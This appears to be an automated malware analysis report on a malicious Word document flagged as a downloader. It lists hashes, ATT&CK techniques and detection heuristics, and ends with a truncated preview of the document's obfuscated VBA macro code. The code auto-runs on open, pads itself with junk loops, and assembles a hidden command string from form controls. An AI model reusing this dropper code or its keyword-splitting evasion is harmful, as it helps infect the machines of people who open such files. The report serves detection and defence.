Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 71c57fe6c69a3b1f…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 178.8 KB
Created: 2019-12-11 07:44:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: f666b80c310e31c51a8cb17d6b3cfac3
SHA-1: fb882eed502591059f59baeb84e7d9df3c0abf23
SHA-256: 71c57fe6c69a3b1f5a6536fac645bc9f1423664aebbe97ba340f7678a14a2717
Risk score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open auto-execution macro, a common technique for initial execution. The macros call `CreateObject` with object names reassembled from string fragments (for example 'winmgmts') to launch processes via WMI, indicating downloader or dropper functionality. A ClamAV detection for 'Doc.Downloader.Generic' further supports this assessment.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7444888-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-7444888-0
  • VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code.
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open auto-execution macro present.
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call present.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7696 bytes
SHA-256: 555d97810ff18e263088ae8568876865e16110c96c67ae8906495c361146df45

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Wdzxfyoq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Dhecbewtk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Drwrylpvnmfv = Aqysmcnevkszq To 0
         Xgcihxeyfyzcb = (13 - Atn(51) - (44 + Round(41) * Aedrnvzec / CInt(1)))
    Select Case Zwmzyvzwq
      Case Nmbwrttm
         Voknvzbcxc = CLng(Ayhmgzec)
         Bwrrpqdgkqhv = Oct(Bldvyttcd)
      Case Dpfmtixgcn
         Ejlyrrjsftzkv = Elzytefmb
         Rhkobtopymnv = Int(29)
   End Select
Next
   For Vtcgzkmbgru = Orcxqzufzjd To 0
         Rviucbwnjmzp = (13 - Atn(51) - (44 + Round(41) * Hwodmpzidyf / CInt(1)))
    Select Case Lhvkzhdsqsmpt
      Case Fediijnj
         Rivirkokc = CLng(Nczhexrdb)
         Iwdyvxipyyke = Oct(Ikyiyfqwxrcda)
      Case Vgjsyazfsp
         Nlhdysiv = Vciclylwrxdd
         Amjyjfftidck = Int(29)
   End Select
Next
   For Dwcfeyhy = Bezymiwgxs To 0
         Ngeddmtrbhg = (13 - Atn(51) - (44 + Round(41) * Vodihnqllbmn / CInt(1)))
    Select Case Amcmdhnivabu
      Case Pjtxufqus
         Eeebespzste = CLng(Dxfmsdgmrlvc)
         Szdguewydig = Oct(Luclkkzuw)
      Case Bpscmsiz
         Xapnkuxe = Fbuuspalrivwz
         Elulkzhug = Int(29)
   End Select
Next
Xtfakdhpq
End Sub

Attribute VB_Name = "Zgzonzzft"
Attribute VB_Base = "0{CE81A769-145F-443B-8E1F-0D5017540E62}{9D7B60EB-257F-451F-8DBF-E1BD439C4B8A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tvngwwozfz"
Function Kdklpvzq()
   For Ewuufquzapr = Msvikdnc To 0
         Xwqdqtzx = (13 - Atn(51) - (44 + Round(41) * Llwlepanzsq / CInt(1)))
    Select Case Tdukyqbrks
      Case Yondfbriqrbvj
         Cactmynwawja = CLng(Vascoganj)
         Zqsccyauvyr = Oct(Hyksnhwbkburi)
      Case Ytpricmiuuyx
         Liestvqvi = Xpooxlug
         Biayxuqpxokn = Int(29)
   End Select
Next
Fqifrbpyjlsis = Wdzxfyoq.Dhecbewtk
   For Ldcmwaxyk = Ujmlwuqo To 0
         Spzcslljru = (13 - Atn(51) - (44 + Round(41) * Xgtckddbehft / CInt(1)))
    Select Case Lwfxcsiwto
      Case Eomoshscmg
         Jnkjgkjggfzo = CLng(Rtjamezayppp)
         Bsafelophzpjf = Oct(Yoxlypzs)
      Case Nujovurvkfnf
         Rfclkldzcw = Reqjbapl
         Ealeynurptun = Int(29)
   End Select
Next
Bjcluinwj = Fqifrbpyjlsis + Zgzonzzft.Xyrlviug + Zgzonzzft.Laxeemkffx + Zgzonzzft.Wfegvhtqdodyq
   For Iqidbhmw = Vlsgmzoc To 0
         Sndceibozfdx = (13 - Atn(51) - (44 + Round(41) * Jtfzlsvkzetm / CInt(1)))
    Select Case Rpiyrxiu
      Case Ytgyxazxj
         Tuoqdyhozirya = CLng(Xfgeiogybr)
         Nyfwdiexuthoy = Oct(Nyhugbndt)
      Case Shmvnyrau
         Moqvyodysfhj = Txfwzvmf
         Wlygiwygpul = Int(29)
   End Select
Next
Edlhicqhv = Bjcluinwj + Zgzonzzft.Sgpovdkwouyjy + Zgzonzzft.Ljjbswuhxdzup.ControlTipText
   For Jjjnqyljxo = Srldhxsyw To 0
         Vjqvxflljtvtv = (13 - Atn(51) - (44 + Round(41) * Sgixvtefc / CInt(1)))
    Select Case Vkwixqqk
      Case Zcodlcbl
         Qkcelpyxeqeon = CLng(Bpawfdlfbs)
         Ukrdtgjolhrw = Oct(Sfwylpwtjmao)
      Case Eealhwennnli
         Ytyepnkfi = Oxaaedeoo
         Hfolmfsjn = Int(29)
   End Select
Next
Kdklpvzq = Mljqcgfsu + Edlhicqhv + Mljqcgfsu
   For Hcrtrtkcyi = Jbhtajkww To 0
         Ahtjsqyf = (13 - Atn(51) - (44 + Round(41) * Kvbeodiwkz / CInt(1)))
    Select Case Hjxtybsxo
      Case Zqmyjslacqxy
         Pmfbalndt = CLng(Lzrwnfvvab)
         Fyeyzvqk = Oct(Mjonvodhvxmo)
      Case Tdplbdefbkzc
         Oidpztmiha = Rtgqpqalf
         Eigmhhent = Int(29)
   End Select
Next
End Function
Function Xtfakdhpq()
   For Nskutxfxe = Zhsyhbdfwf To 0
         Oshkochhw = (13 - Atn(51) - (44 + Round(41) * Uibzvyt
... (truncated)